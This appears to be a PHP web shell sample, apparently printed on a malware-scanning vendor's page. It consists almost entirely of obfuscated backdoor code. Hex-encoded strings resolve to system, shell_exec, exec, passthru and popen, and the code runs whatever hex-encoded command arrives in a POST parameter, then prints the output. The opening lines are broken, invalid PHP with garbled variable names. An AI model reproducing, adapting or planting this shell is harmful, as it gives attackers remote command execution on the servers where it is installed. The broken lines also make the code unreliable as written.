'7'0 = '4';
'7'1 = '1';
'7'2 = 'f';
'7'3 = 'e';
$accepted1 = pack("H*", '73797374656d');
$accepted2 = pack("H*", '7368656c6c5f65786563');
$accepted3 = pack("H*", '65786563');
$accepted4 = pack("H*", '7061737374687275');
$accepted5 = pack("H*", '706f70656e');
$accepted6 = pack("H*", '7377'0 . '726567'1 . '6d57'2 . '6765745f6367'2 . '67'3 . '77'0 . '656e7473');
$accepted7 = pack("H*", '70636c6f7365');
$uconvert = pack("H*", '756367'2 . '67'3 . '76657277'0);
if(isset($_POST[$uconvert])){
$uconvert=pack("H*",$_POST[$uconvert]);
if(function_exists($accepted1)){
$accepted1($uconvert);
}
elseif(function_exists($accepted2)){
print $accepted2($uconvert);
}
elseif(function_exists($accepted3)){
$accepted3($uconvert,$variable_var);
print join("\n",$variable_var);
}
elseif(function_exists($accepted4)){
$accepted4($uconvert);
}
elseif(function_exists($accepted5)&&function_exists($accepted6)&&function_exists($accepted7)){
$argument_constant=$accepted5($uconvert,"r");
if($argument_constant){
$property_storage=$accepted6($argument_constant);
$accepted7($argument_constant);
print $property_storage;
}
}
exit;
}
© 2023 Quttera Ltd. All rights reserved.